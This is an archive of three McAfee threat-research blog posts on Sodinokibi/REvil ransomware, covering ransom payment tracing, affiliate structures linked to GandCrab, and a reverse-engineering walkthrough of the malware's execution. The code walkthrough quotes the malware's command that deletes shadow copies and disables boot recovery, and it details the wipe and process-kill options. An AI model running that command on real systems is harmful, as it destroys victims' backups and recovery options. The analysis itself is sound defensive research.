Category Archives: McAfee Labs

McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – Follow The Money

Episode 3: Follow the Money

This is the third installment of the McAfee Advanced Threat Research (ATR) analysis of Sodinokibi and its connections to GandCrab, the most prolific Ransomware-as-a-Service (RaaS) Campaign of 2018 and mid 2019.

The Talking Heads once sang “We’re on a road to nowhere.” This expresses how challenging it can be when one investigates the financial trails behind a RaaS scheme with many affiliates, etc.

However, we persisted, and we prevailed. By linking underground forum posts with bitcoin transfer traces, we were able to uncover new information on the size of the campaign and associated revenue; even getting detailed insights into what the affiliates do with their earnings following a successful attack.

With the Sodinokibi ransomware a unique BTC wallet is generated for each victim. As long as no payment is made, no trace of the BTC wallet will be available on the blockchain. The blockchain operates as a public ledger of all bitcoin transactions that have happened. When no currencies are exchanged, no transactions are recorded. Although many victims hit the news, we understand that if they paid, sharing that with the research community is maybe a bridge too far. On one of the underground forums we discovered the following post:

In this post the actors are expanding their successful activity and offering a 60 percent cut as a start and, after three successful payments by the affiliate (read successful ransomware infections and payments received from the victims), the cut increases to 70 percent of the payments received. This is very common as we saw in the past with RaaS schemes like GandCrab and Cryptowall.

Responding to this post is an actor with the moniker of ‘Lalartu’ and his comments are quite interesting, hinting he was involved with GandCrab. As a site-note: “Lalartu’ means ‘ghost/phantom’. Its origins are from the Sumerian civilization where Lalartu was seen as a vampiric demon.

Researching the moniker of ‘Lalartu’ through our data, we went back in time a month or so and discovered a posting from the actor on June 4th of 2019, again referencing GandCrab.

We observe here a couple of transaction IDs (TXID) on the bitcoin ledger, however they are incomplete. More than a week later, on June 17th, 2019, “Lalartu” posted another one with an attachment to it:

 

In this posting we see a screenshot with partial TXIDs and the amounts. With the help of the ChainAnalysis software and team, we were able to retrieve the full TXIDs. With that list we were able to investigate the transactions and start mapping them out with their software:

From the various samples we have researched, the amounts asked for payment are between 0.44 and 0.45 BTC, an average of 4,000 USD.

In the above screenshot we see the transactions where some of these amounts are transferred from a wallet, or bitcoins are bought at an exchange and transferred to the wallets associated with the affiliate(s).

Based on the list shared by Lalartu in his post, and the average value of bitcoin around the dates, within 72 hours a value of 287,499.00 USD of ransom had been transferred.

Taking the list of transactions as a starting point in our graph-analysis, we colored the lines red and started from there to investigate the wallets involved and interesting transactions:

Although it might look like spaghetti, once you dive in, very interesting patterns can be discovered. We see victims paying to their assigned wallets; from there it takes an average of two to three transactions before it goes to an ‘affiliate’ or ‘distribution’ wallet. From that wallet we see the split happening as the moniker ‘UNKN’ mentioned in his forum post we started this article with. The 60 or 70 percent stays with the affiliate and the remaining 40/30 percent is forwarded in multiple transactions towards the actors behind Sodinokibi.

Once we identified a couple of these transactions, we started to dig in both directions. What is the affiliate doing with the money and where is the money going for the Sodinokibi actors?

We picked one promising affiliate wallet and started to dig deeper down and followed the transactions. As described above, the affiliate is getting money transferred mostly through an exchange (since this is being advised by the actors in the ransom note). This is what we see in the example below. Incoming ransomware payments via Coinbase.com are received. The affiliate seems to pay some fee to a service but also sends BTC into Bitmix.biz a popular underground bitcoin mixer that is obfuscating the next transactions to make it difficult to link the transactions back to the ‘final’ wallet or cash-out in a (crypto) currency.

We also observed examples where the affiliates were paying for services, they bought on Hydra Market. Hydra Market is a Russian underground marketplace where many services and illegal products are offered with payment in BTC.

Tracing down the route of splits, we started to search for the 30 or 40 percent cuts of the ransom payments of 0.27359811 BTC or, if the price was doubled, 0.54719622 BTC.

Using the list of amounts and querying the transactions and transfers discovered, we observed a wallet that was receiving a lot of these smaller payments. Due to ongoing research we will not publish the wallet but here is a graph representation of a subset of transactions:

It seems like a spider, but many incoming ‘split’ transfers, and only a few outgoing ones with larger amounts of bitcoins, were observed.

If we take the average of $2,500 – $5,000 USD as a ransom ask, and the mentioned split of 30/40 percent for the actor maintaining the Sodinokibi ransomware and affiliate infrastructure, they make $700 – $1,500 USD per paid infection.

We already saw in the beginning of this article that the affiliate Lalartu claimed to have made 287k USD in 72 hours, which is an 86k USD profit for the actor from one affiliate only.

In episode 2, The All-Stars, we explained how the structure is setup and how each affiliate has its own id.

As far as we tracked the samples and extracted the amount of id-numbers, we counted over 41 affiliates being active. The data showed a in a relatively short amount of time the velocity and number of infections was high. Taken this velocity combined with a few payments per day, we can imagine that the actors behind Sodinokibi are making a fortune.

Following the traces of one particular affiliate, we ended up seeing large amounts of bitcoins being transferred into a wallet which had a total value of 443 BTC, around 4,5 million USD with the average bitcoin price.

We do understand that there are situations in which executives decide to pay the ransom but, by doing that, we keep this business model alive and also fund other criminal markets.

Conclusion

In this blog we focused on insights into the financial streams behind ransomware. By linking underground forum posts with bitcoin transfer traces, we were able to uncover new information on the size of the campaign and associated revenue. In some cases, we were able even to get detailed insights into what the affiliates do with their earnings following a “successful” attack. It shows that paying ransomware is not only keeping the ‘ransom-model’ alive but is also supporting other forms of crime.

In the next and final episode, “Crescendo” McAfee ATR reveals insights gleaned from a global network of honey pots.

The post McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – Follow The Money appeared first on McAfee Blogs.

McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – The All-Stars

Episode 2: The All-Stars

Analyzing Affiliate Structures in Ransomware-as-a-Service Campaigns

This is the second installment of the McAfee Advanced Threat Research (ATR) analysis of Sodinokibi and its connections to GandGrab, the most prolific Ransomware-as-a-Service (RaaS) Campaign of 2018 and mid-2019.

GandCrab announced its retirement at the end of May. Since then, a new RaaS family called Sodinokibi, aka REvil, took its place as one of the most prolific ransomware campaigns.

In episode one of our analysis on the Sodinokibi RaaS campaign we shared our extensive malware and post-infection analysis, which included code comparisons to GandCrab, and insight on exactly how massive the new Sodinokibi campaign is.

The Sodinokibi campaigns are still ongoing and differ in execution due to the different affiliates spreading the ransomware. Which begs more questions to be answered, such as how do the affiliates operate? Is the affiliate model working? What can we learn about the campaign and possible connections to GandCrab by investigating the affiliates?

It turns out, through large scale sample analysis and hardcoded value aggregation, we were able to determine which affiliates played a crucial role in the success of GandCrab’ criminal enterprise and found a lot of similarity between the RaaS enterprise of GandCrab and that of Sodinokibi.

Before we begin with the Sodinokibi analysis and comparison we will briefly explain the methodology that we used for GandCrab.

GandCrab RaaS System

GandCrab was a prime example of a Ransomware-as-a-Service. RaaS follows a structure where the developers are offering their product to affiliates, partners or advertisers who are responsible for spreading the ransomware and generating infections. The developers take a percentage of the earned income and provide the other portion to the affiliates.

FIGURE 1. HIGH LEVEL OVERVIEW OF THE GANDCRAB RAAS MODEL

Operating a RaaS model can be lucrative for both parties involved:

  • Developer’s perspective: The malware author/s request a percentage per payment for use of the ransomware product. This way the developers have less risk than the affiliates spreading the malware. The developers can set certain targets for their affiliates regarding the amount of infections they need to produce. In a way, this is very similar to a modern sales organization in the corporate world.

Subsequently, a RaaS model offers malware authors a safe haven when they operate from a country that does not regard developing malware as a crime. If their own nation’s citizens are not victimized, the developers are not going to be prosecuted.

  • Affiliate perspective: As an affiliate you do not have to write the ransomware code yourself; less technical skill is involved. RaaS makes ransomware more accessible to a greater number of users. An affiliate just needs to be accepted in the criminal network and reach the targets set by the developers. As a service model it also offers a level of decentralization where each party sticks to their own area of expertise.

Getting a Piece of the Pie

Affiliates want to get paid proportionate to the infections they made; they expose themselves to a large amount of risk by spreading ransomware and they want to reap the benefits. Mutual trust between the developer and the affiliate plays a huge role in joining a RaaS system. It is very much like the expression: “Trust, hard to build, and easy to lose” and this largely explains the general skepticism that cybercriminal forum members display when a new RaaS system is announced.

For the RaaS service to grow and maintain their trust, proper administration of infections/earnings per affiliate plays an important part. Through this, the developers can ensure that everyone gets an honest piece of the proverbial “pie”. So how can this administration be achieved? One way is having hardcoded values in the ransomware.

Linking the Ransomware to Affiliates

Through our technical malware analysis, we established that, starting from version 4, GandCrab included certain hardcoded values in the ransomware source code:

  • id – The affiliate id number.
  • sub_id – The Sub ID of the affiliate ID; A tracking number for the affiliate for sub-renting infections or it tracks their own campaign, identifiable via the sub_id number.
  • version – The internal version number of the malware.

Version 4 had significant changes overall and we believe that these changes were partly done by the authors to improve administration and make GandCrab more scalable to cope with its increased popularity.

Based on the hardcoded values it was possible for us, to a certain extent, to extract the administration information and create our own overview. We hunted for as many different GandCrab samples as we could find, using Yara rules, industry contacts and customer submissions. The sample list we gathered is quite extensive but not exhaustive. From the collected samples we extracted the hardcoded values and compile times automatically, using a custom build tool. We aggregated all these values together in one giant timeline from GandCrab version 4, all the way up to version 5.2.

FIGURE 2. SMALL PORTION OF THE TIMELINE OF COLLECTED SAMPLES (NOTE THE FIRST FOUR POSSIBLY TIME STOMPED)

ID and SUB_ID Characteristics Observed

Parent-Child Relationship
The extracted ID’s and Sub_IDs showed a parent-child relationship, meaning every ID could have more than one SUB_ID (child) but every SUB_ID only had one ID (parent).

FIGURE 3. THE ACTIVITY OF ID NUMBER 41 (PARENT) AND ITS CORRESPONDING SUB_IDs (CHILDREN)

ID Increments
Overall, we observed a gradual increment in the ID number over time. The earlier versions generally had lower ID numbers and higher ID numbers appeared with the later versions.

However, there were relatively lower ID numbers that appeared in many versions, as shown in figure 3.

This observation aligned with our theory that the ID number corresponds with a particular affiliate. Certain affiliates remained partners for a long period of time, spreading different versions of GandCrab; this explains the ID number appearing over a longer period and in different versions. This theory has also been acknowledged by several (anonymous) sources.

Determining Top ID’s/Affiliates
When we applied the theory that the ID corresponded with an affiliate, we observed different activity amongst the affiliates. There are some affiliates/ID’s that were only linked to a single sample that we found. A reason for affiliates to only appear for a short moment can be explained by the failure to perform. The GandCrab developers had a strict policy of expelling affiliates that underperformed. Expelling an affiliate would open a new slot that would receive a new incremented ID number.

On the other hand, we observed several very active affiliates, “The All-Stars”, of which ID number 99 was by far the most active. We first observed ID 99 in six different samples of version 4.1.1, growing to 35 different samples in version 5.04. Based on our dataset we observed 71 unique unpacked samples linked to ID 99.

Being involved with several versions (consistency over time), in combination with the number of unique samples (volume) and the number of infections (based on industry malware detections) can effectively show which affiliate was the most aggressive and possibly the most important to the RaaS network.

Affiliate vs. Salesperson & Disruption

An active affiliate can be compared to a top salesperson in any normal commercial organization. Given that the income of the RaaS network is largely dependent on the performance of its top affiliates, identifying and disrupting a top affiliate’s activity can have a crippling effect on the income of the RaaS network, internal morale and overall RaaS performance. This can be achieved through arrests of an affiliate and/or co-conspirers.

Another way is disrupting the business model and lowering the ransomware’s profits through offering free decryption tools or building vaccines that prevent encryption. The disruption will increase the operational costs for the criminals, making the RaaS of less interest.

Lastly, for any future proceedings (suspect apprehension and legal) it is important to maintain a chain of custody linking victims, samples and affiliates together. Security providers as gatherers and owners of this data play a huge role in safeguarding this for the future.

Overview Versions and ID Numbers

Using an online tool from RAWGraphs we created a graphic display of the entire dataset showing the relationship between the versions and the ID numbers. Below is an overview, a more detailed overview can be found on the McAfee ATR Github.

FIGURE 4. OVERVIEW OF GANDCRAB VERSIONS AND IDs

Top performing affiliates immediately stood out from the rest as the lines were thicker and more spread out. According to our data, the most active ID numbers were 15,41,99 and 170. Determining the key players in a RaaS family can help Law Enforcement prioritize its valuable resources.

Where are the All-Stars? Top Affiliates Missing in 5.2

At the time we were not realizing it fully but, looking back at the overview, it stands out that none of the top affiliates/ID numbers where present in the final version 5.2 of GandCrab which was released in February. We believe that this was an early indicator that the end of GandCrab was imminent.

This discovery might indicate that some kind of event had taken place that resulted in the most active affiliates not being present. The cause could have been internal or external.

But what puzzles us is why would a high performing affiliate leave? Maybe we will never hear the exact reason. Perhaps it is quite similar to why people leave regular jobs… feeling unhappy, a dispute or leaving for a better offer.

With the absence of the top affiliates the question remains; Where did these affiliates go to?

FIGURE 5. ID AND SUB_ID NUMBER LINKED TO VERSION 5.2

Please note that active ID numbers 15,41,99 and170 from the complete overview are not present in any GandCrab version 5.2 infections. The most active affiliate in version 5.2. was nr 287.

Goodbye GandCrab, Hello Sodinokibi/REvil

In our opening episode we described the technical similarities we have seen between GandCrab and REvil. We are not the only ones that noticed these similarities – security reporter Brian Krebs published an article where he highlights the similarities between GandCrab and a new ransomware named Sodinokibi or REvil, and certain postings that were made on several underground forums.

Affiliates Switching RaaS Families….

On two popular underground Forums a user named UNKN, aka unknown, placed an advertisement on the 4th of July 2019, for a private ransomware as a service (RaaS) he had been running for some time. Below is a screenshot of the posting. Interesting is the response from a user with the nickname Lalartu. In a reply to the advertisement, Lalartu mentions that he is working with UNKN and his team, as well as that they had been a former GandCrab affiliate, something that was noticed by Bleepingcomputer too. Lalartu’s post supports our earlier observations that some top GandCrab affiliates suddenly disappeared and might have moved to a different RaaS family. This is something that was suspected but never confirmed with technical evidence.

We suspect that Lalartu is not the only GandCrab affiliate that has moved to Sodinokibi. If top affiliates have a solid and very profitable infection method available, then it does not make sense to retire with the developers.

Around February 2019, there was a noticeable change in some of GandCrab’s infections behavior. Managed Service Providers (MSP) were now targeted through vulnerable systems and their customers got infected with GandCrab on a large scale, something we had not seen performed before by any of the affiliates. Interestingly, shortly after the retirement of GandCrab, the MSP modus operandi was quickly adopted by Sodinokibi, another indication that a former GandCrab affiliate had moved to Sodinokibi.

This makes us suspect that Sodinokibi is actively recruiting the top performing affiliates from other successful RaaS families, creating a sort of all-star team.

At the same time, the RaaS market is such where less proficient affiliates can hone their skills, improve their spreading capabilities and pivot to the more successful RaaS families. Combined with a climate where relatively few ransomware arrests are taking place, it allows for an alarming cybercriminal career path with dire consequences.

Gathering “administration” from Sodinokibi/Revil Samples

Another similarity Sodinokibi shares with GandCrab is the administration of infections, one of the indicators of a RaaS’s growth potential. In our earlier blog we discussed that Sodinokibi generates a JSON config file for each sample containing certain values such as a PID number and a value labeled sub. So, we decided to use our GandCrab affiliate methodology on the Sodinokibi config files we were able to collect.

With GandCrab we had to write our own tool to pull the hardcoded indicators but, with Sodinokibi, we were lucky enough that Carbon Black had developed a tool that did much of the heavy lifting for us. In the end there were still some samples from which we had to pull the configs manually. The JSON file contains different values and fields; for a comparison to GandCrab we focused on the PID and SUB field of each sample as these values appeared to have a similar characteristic as the ID and SUB_ID field in the GandCrab samples.

FIGURE 6. REVIL JSON CONFIG VALUES

Interpreting the Data Structures

With the data we gathered, we used the same analysis methodology on Sodinokibi  as we did on GandCrab. We discovered that Sodinokibi has a RaaS structure very similar to GandCrab and with the Parent-Child relationship structure being nearly identical. Below we compared activity of GandCrab affiliate number 99 with the activity of the Sodinokibi affiliate number 19.

FIGURE 7. THE ACTIVITY OF GANDCRAB ID NO 99 (PARENT) AND ITS CORRESPONDING SUB (CHILDREN)

FIGURE 8. THE ACTIVITY OF SODINOKIBI PID NO 19 (PARENT) AND ITS CORRESPONDING SUB (CHILDREN)

It needs to be said that the timespan for the GandCrab overview was generated over a long period of time with a larger total of samples than the Sodinokibi overview.

Nevertheless, the similarity is quit striking.

The activity of both ID numbers displays a tree-shaped structure with the parent ID number at the root and branching out to the respective SUB numbers linked to multiple samples.

We believe that the activity above might be linked to a tiered affiliate group that is specialized in RDP brute forcing and infecting systems with Sodinokibi after each successful compromise.

Both RaaS family structures are too large to effectively publish within the space of this blog. Our Complete overview for the Sodinokibi RaaS structure can be found on our McAfee GitHub.

Conclusion

When we started our journey with GandCrab we did not expect it would take us so far down the rabbit hole. Mass sample analysis and searching for administration indicators provided a way to get more insight in a multi-million-dollar criminal enterprise, determine key players and foresee future events through changes in the business structure. We believe that the retirement of GandCrab was not an overnight decision and, based on the data on the affiliates, it was clear that something was going to happen.

With the emergence of Sodinokibi and the few forum postings by a high profile former GandCrab affiliate, everything fell into place. We have strong indications that some of the top affiliates have found a new home with Sodinokibi to further their criminal business.

Given that the income of the RaaS network is largely dependent on the performance of its top affiliates, and it is run like a normal business, we (the security industry) should not only research the products the criminals develop, but also identify possible ways to successfully disrupt the criminal business.

In our next episode we dive deeper into the financial streams involved in the affiliate program and provide an estimate of how much money these actors are earning with the ransomware-as-a-service business model.

The post McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – The All-Stars appeared first on McAfee Blogs.

McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us

Episode 1: What the Code Tells Us

McAfee’s Advanced Threat Research team (ATR) observed a new ransomware family in the wild, dubbed Sodinokibi (or REvil), at the end of April 2019. Around this same time, the GandCrab ransomware crew announced they would shut down their operations. Coincidence? Or is there more to the story?

In this series of blogs, we share fresh analysis of Sodinokibi and its connections to GandCrab, with new insights gleaned exclusively from McAfee ATR’s in-depth and extensive research.

  • Episode 1: What the Code Tells Us
  • Episode 2: The All-Stars
  • Episode 3: Follow the Money
  • Episode 4: Crescendo

In this first instalment we share our extensive malware and post-infection analysis and visualize exactly how big the Sodinokibi campaign is.

Background

Since its arrival in April 2019, it has become very clear that the new kid in town, “Sodinokibi” or “REvil” is a serious threat. The name Sodinokibi was discovered in the hash ccfde149220e87e97198c23fb8115d5a where ‘Sodinokibi.exe’ was mentioned as the internal file name; it is also known by the name of REvil.

At first, Sodinokibi ransomware was observed propagating itself by exploiting a vulnerability in Oracle’s WebLogic server. However, similar to some other ransomware families, Sodinokibi is what we call a Ransomware-as-a-Service (RaaS), where a group of people maintain the code and another group, known as affiliates, spread the ransomware.

This model allows affiliates to distribute the ransomware any way they like. Some affiliates prefer mass-spread attacks using phishing-campaigns and exploit-kits, where other affiliates adopt a more targeted approach by brute-forcing RDP access and uploading tools and scripts to gain more rights and execute the ransomware in the internal network of a victim. We have investigated several campaigns spreading Sodinokibi, most of which had different modus operandi but we did notice many started with a breach of an RDP server.

Who and Where is Sodinokibi Hitting?

Based on visibility from MVISION Insights we were able to generate the below picture of infections observed from May through August 23rd, 2019:

Who is the target? Mostly organizations, though it really depends on the skills and expertise from the different affiliate groups on who, and in which geo, they operate.

Reversing the Code

In this first episode, we will dig into the code and explain the inner workings of the ransomware once it has executed on the victim’s machine.

Overall the code is very well written and designed to execute quickly to encrypt the defined files in the configuration of the ransomware. The embedded configuration file has some interesting options which we will highlight further in this article.

Based on the code comparison analysis we conducted between GandCrab and Sodinokibi we consider it a likely hypothesis that the people behind the Sodinokibi ransomware may have some type of relationship with the GandCrab crew.

FIGURE 1.1. OVERVIEW OF SODINOKIBI’S EXECUTION FLAW

Inside the Code

Sodinokibi Overview

For this article we researched the sample with the following hash (packed):

The main goal of this malware, as other ransomware families, is to encrypt your files and then request a payment in return for a decryption tool from the authors or affiliates to decrypt them.

The malware sample we researched is a 32-bit binary, with an icon in the packed file and without one in the unpacked file. The packer is programmed in Visual C++ and the malware itself is written in pure assembly.

Technical Details

The goal of the packer is to decrypt the true malware part and use a RunPE technique to run it from memory. To obtain the malware from memory, after the decryption is finished and is loaded into the memory, we dumped it to obtain an unpacked version.

The first action of the malware is to get all functions needed in runtime and make a dynamic IAT to try obfuscating the Windows call in a static analysis.

FIGURE 2. THE MALWARE GETS ALL FUNCTIONS NEEDED IN RUNTIME

The next action of the malware is trying to create a mutex with a hardcoded name. It is important to know that the malware has 95% of the strings encrypted inside. Consider that each sample of the malware has different strings in a lot of places; values as keys or seeds change all the time to avoid what we, as an industry do, namely making vaccines or creating one decryptor without taking the values from the specific malware sample to decrypt the strings.

FIGURE 3. CREATION OF A MUTEX AND CHECK TO SEE IF IT ALREADY EXISTS

If the mutex exists, the malware finishes with a call to “ExitProcess.” This is done to avoid re-launching of the ransomware.

After this mutex operation the malware calculates a CRC32 hash of a part of its data using a special seed that changes per sample too. This CRC32 operation is based on a CRC32 polynomial operation instead of tables to make it faster and the code-size smaller.

The next step is decrypting this block of data if the CRC32 check passes with success. If the check is a failure, the malware will ignore this flow of code and try to use an exploit as will be explained later in the report.

FIGURE 4. CALCULATION OF THE CRC32 HASH OF THE CRYPTED CONFIG AND DECRYPTION IF IT PASSES THE CHECK

In the case that the malware passes the CRC32 check and decrypts correctly with a key that changes per sample, the block of data will get a JSON file in memory that will be parsed. This config file has fields to prepare the keys later to encrypt the victim key and more information that will alter the behavior of the malware.

The CRC32 check avoids the possibility that somebody can change the crypted data with another config and does not update the CRC32 value in the malware.

After decryption of the JSON file, the malware will parse it with a code of a full JSON parser and extract all fields and save the values of these fields in the memory.

FIGURE 5. PARTIAL EXAMPLE OF THE CONFIG DECRYPTED AND CLEANED

Let us explain all the fields in the config and their meanings:

  • pk -> This value encoded in base64 is important later for the crypto process; it is the public key of the attacker.
  • pid -> The affiliate number that belongs to the sample.
  • sub -> The subaccount or campaign id for this sample that the affiliate uses to keep track of its payments.
  • dbg -> Debug option. In the final version this is used to check if some things have been done or not; it is a development option that can be true or false. In the samples in the wild it is in the false state. If it is set, the keyboard check later will not happen. It is useful for the malware developers to prove the malware works correctly in the critical part without detecting his/her own machines based on the language.
  • fast -> If this option is enabled, and by default a lot of samples have it enabled, the malware will crypt the first 1 megabyte of each target file, or all files if it is smaller than this size. In the case that this field is false, it will crypt all files.
  • wipe -> If this option is ‘true’, the malware will destroy the target files in the folders that are described in the json field “wfld”. This destruction happens in all folders that have the name or names that appear in this field of the config in logic units and network shares. The overwriting of the files can be with trash data or null data, depending of the sample.
  • wht -> This field has some subfields: fld -> Folders that should not be crypted; they are whitelisted to avoid destroying critical files in the system and programs. fls -> List of whitelists of files per name; these files will never be crypted and this is useful to avoid destroying critical files in the system. ext -> List of the target extensions to avoid encrypting based on extension.
  • wfld -> A list of folders where the files will be destroyed if the wipe option is enabled.
  • prc -> List of processes to kill for unlocking files that are locked by this/these program/s, for example, “mysql.exe”.
  • dmn -> List of domains that will be used for the malware if the net option is enabled; this list can change per sample, to send information of the victim.
  • net -> This value can be false or true. By default, it is usually true, meaning that the malware will send information about the victim if they have Internet access to the domain list in the field “dmn” in the config.
  • nbody -> A big string encoded in base64 that is the template for the ransom note that will appear in each folder where the malware can create it.
  • nname -> The string of the name of the malware for the ransom note file. It is a template that will have a part that will be random in the execution.
  • exp -> This field is very important in the config. By default it will usually be ‘false’, but if it is ‘true’, or if the check of the hash of the config fails, it will use the exploit CVE-2018-8453. The malware has this value as false by default because this exploit does not always work and can cause a Blue Screen of Death that avoids the malware’s goal to encrypt the files and request the ransom. If the exploit works, it will elevate the process to SYSTEM user.
  • img -> A string encoded in base64. It is the template for the image that the malware will create in runtime to change the wallpaper of the desktop with this text.

After decrypting the malware config, it parses it and the malware will check the “exp” field and if the value is ‘true’, it will detect the type of the operative system using the PEB fields that reports the major and minor version of the OS.

FIGURE 6. CHECK OF THE VERSION OF THE OPERATIVE SYSTEM

Usually only one OS can be found but that is enough for the malware. The malware will check the file-time to verify if the date was before or after a patch was installed to fix the exploit. If the file time is before the file time of the patch, it will check if the OS is 64-bit or 32-bit using the function “GetSystemNativeInfoW”. When the OS system is 32-bit, it will use a shellcode embedded in the malware that is the exploit and, in the case of a 64-bit OS, it will use another shellcode that can use a “Heaven´s Gate” to execute code of 64 bits in a process of 32 bits.

FIGURE 7. CHECK IF OS IS 32- OR 64-BIT

In the case that the field was false, or the exploit is patched, the malware will check the OS version again using the PEB. If the OS is Windows Vista, at least it will get from the own process token the level of execution privilege. When the discovered privilege level is less than 0x3000 (that means that the process is running as a real administrator in the system or SYSTEM), it will relaunch the process using the ‘runas’ command to elevate to 0x3000 process from 0x2000 or 0x1000 level of execution. After relaunching itself with the ‘runas’ command the malware instance will finish.

FIGURE 8. CHECK IF OS IS WINDOWS VISTA MINIMAL AND CHECK OF EXECUTION LEVEL

The malware’s next action is to check if the execute privilege is SYSTEM. When the execute privilege is SYSTEM, the malware will get the process “Explorer.exe”, get the token of the user that launched the process and impersonate it. It is a downgrade from SYSTEM to another user with less privileges to avoid affecting the desktop of the SYSTEM user later.

After this it will parse again the config and get information of the victim’s machine This information is the user of the machine, the name of the machine, etc. The malware prepares a victim id to know who is affected based in two 32-bit values concat in one string in hexadecimal.

The first part of these two values is the serial number of the hard disk of the Windows main logic unit, and the second one is the CRC32 hash value that comes from the CRC32 hash of the serial number of the Windows logic main unit with a seed hardcoded that change per sample.

FIGURE 9. GET DISK SERIAL NUMBER TO MAKE CRC32 HASH

After this, the result is used as a seed to make the CRC32 hash of the name of the processor of the machine. But this name of the processor is not extracted using the Windows API as GandCrab does; in this case the malware authors use the opcode CPUID to try to make it more obfuscated.

FIGURE 10. GET THE PROCESSOR NAME USING CPUID OPCODE

Finally, it converts these values in a string in a hexadecimal representation and saves it.

Later, during the execution, the malware will write in the Windows registry the next entries in the subkey “SOFTWARE\recfg” (this subkey can change in some samples but usually does not).

The key entries are:

  • 0_key -> Type binary; this is the master key (includes the victim’s generated random key to crypt later together with the key of the malware authors).
  • sk_key -> As 0_key entry, it is the victim’s private key crypted but with the affiliate public key hardcoded in the sample. It is the key used in the decryptor by the affiliate, but it means that the malware authors can always decrypt any file crypted with any sample as a secondary resource to decrypt the files.
  • pk_key -> Victim public key derivate from the private key.
  • subkey -> Affiliate public key to use.
  • stat -> The information gathered from the victim machine and used to put in the ransom note crypted and in the POST send to domains.
  • rnd_ext -> The random extension for the encrypted files (can be from 5 to 10 alphanumeric characters).

The malware tries to write the subkey and the entries in the HKEY_LOCAL_MACHINE hive at first glance and, if it fails, it will write them in the HKEY_CURRENT_USER hive.

FIGURE 11. EXAMPLE OF REGISTRY ENTRIES AND SUBKEY IN THE HKLM HIVE

The information that the malware gets from the victim machine can be the user name, the machine name, the domain where the machine belongs or, if not, the workgroup, the product name (operating system name), etc.

After this step is completed, the malware will check the “dbg” option gathered from the config and, if that value is ‘true’, it will avoid checking the language of the machine but if the value is ‘false’ ( by default), it will check the machine language and compare it with a list of hardcoded values.

FIGURE 12. GET THE KEYBOARD LANGUAGE OF THE SYSTEM

The malware checks against the next list of blacklisted languages (they can change per sample in some cases):

  • 0x818 – Romanian (Moldova)
  • 0x419 – Russian
  • 0x819 – Russian (Moldova)
  • 0x422 – Ukrainian
  • 0x423 – Belarusian
  • 0x425 – Estonian
  • 0x426 – Latvian
  • 0x427 – Lithuanian
  • 0x428 – Tajik
  • 0x429 – Persian
  • 0x42B – Armenian
  • 0x42C – Azeri
  • 0x437 – Georgian
  • 0x43F – Kazakh
  • 0x440 – Kyrgyz
  • 0x442 –Turkmen
  • 0x443 – Uzbek
  • 0x444 – Tatar
  • 0x45A – Syrian
  • 0x2801 – Arabic (Syria)

We observed that Sodinokibi, like GandCrab and Anatova, are blacklisting the regular Syrian language and the Syrian language in Arabic too. If the system contains one of these languages, it will exit without performing any action. If a different language is detected, it will continue in the normal flow.

This is interesting and may hint to an affiliate being involved who has mastery of either one of the languages. This insight became especially interesting later in our investigation.

If the malware continues, it will search all processes in the list in the field “prc” in the config and terminate them in a loop to unlock the files locked for this/these process/es.

FIGURE 13. SEARCH FOR TARGET PROCESSES AND TERMINATE THEM

After this it will destroy all shadow volumes of the victim machine and disable the protection of the recovery boot with this command:

  • exe /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures

It is executed with the Windows function “ShellExecuteW”.

FIGURE 14. LAUNCH COMMAND TO DESTROY SHADOW VOLUMES AND DESTROY SECURITY IN THE BOOT

Next it will check the field of the config “wipe” and if it is true will destroy and delete all files with random trash or with NULL values. If the malware destroys the files , it will start enumerating all logic units and finally the network shares in the folders with the name that appear in the config field “wfld”.

FIGURE 15. WIPE FILES IN THE TARGET FOLDERS

In the case where an affiliate creates a sample that has defined a lot of folders in this field, the ransomware can be a solid wiper of the full machine.

The next action of the malware is its main function, encrypting the files in all logic units and network shares, avoiding the white listed folders and names of files and extensions, and dropping the ransom note prepared from the template in each folder.

FIGURE 16. CRYPT FILES IN THE LOGIC UNITS AND NETWORK SHARES

After finishing this step, it will create the image of the desktop in runtime with the text that comes in the config file prepared with the random extension that affect the machine.

The next step is checking the field “net” from the config, and, if true, will start sending a POST message to the list of domains in the config file in the field “dmn”.

FIGURE 17. PREPARE THE FINAL URL RANDOMLY PER DOMAIN TO MAKE THE POST COMMAND

This part of the code has similarities to the code of GandCrab, which we will highlight later in this article.

After this step the malware cleans its own memory in vars and strings but does not remove the malware code, but it does remove the critical contents to avoid dumps or forensics tools that can gather some information from the RAM.

FIGURE 18. CLEAN MEMORY OF VARS

If the malware was running as SYSTEM after the exploit, it will revert its rights and finally finish its execution.

FIGURE 19. REVERT THE SYSTEM PRIVILEGE EXECUTION LEVEL

Code Comparison with GandCrab

Using the unpacked Sodinokibi sample and a v5.03 version of GandCrab, we started to use IDA and BinDiff to observe any similarities. Based on the Call-Graph it seems that there is an overall 40 percent code overlap between the two:

FIGURE 20. CALL-GRAPH COMPARISON

The most overlap seems to be in the functions of both families. Although values change, going through the code reveals similar patterns and flows:

Although here and there are some differences, the structure is similar:

 

We already mentioned that the code part responsible for the random URL generation has similarities with regards to how it is generated in the GandCrab malware. Sodinokibi is using one function to execute this part where GandCrab is using three functions to generate the random URL. Where we do see some similar structure is in the parts for the to-be-generated URL in both malware codes. We created a visual to explain the comparison better:

FIGURE 21. URL GENERATION COMPARISON

We observe how even though the way both ransomware families generate the URL might differ, the URL directories and file extensions used have a similarity that seems to be more than coincidence. This observation was also discovered by Tesorion in one of its blogs.

Overall, looking at the structure and coincidences, either the developers of the GandCrab code used it as a base for creating a new family or, another hypothesis, is that people got hold of the leaked GandCrab source code and started the new RaaS Sodinokibi.

Conclusion

Sodinokibi is a serious new ransomware threat that is hitting many victims all over the world.

We executed an in-depth analysis comparing GandCrab and Sodinokibi and discovered a lot of similarities, indicating the developer of Sodinokibi had access to GandCrab source-code and improvements. The Sodinokibi campaigns are ongoing and differ in skills and tools due to the different affiliates operating these campaigns, which begs more questions to be answered. How do they operate? And is the affiliate model working? McAfee ATR has the answers in episode 2, “The All Stars.”

Coverage

McAfee is detecting this family by the following signatures:

  • “Ransom-Sodinokibi”
  • “Ransom-REvil!”.

MITRE ATT&CK Techniques

The malware sample uses the following MITRE ATT&CK™ techniques:

  • File and Directory Discovery
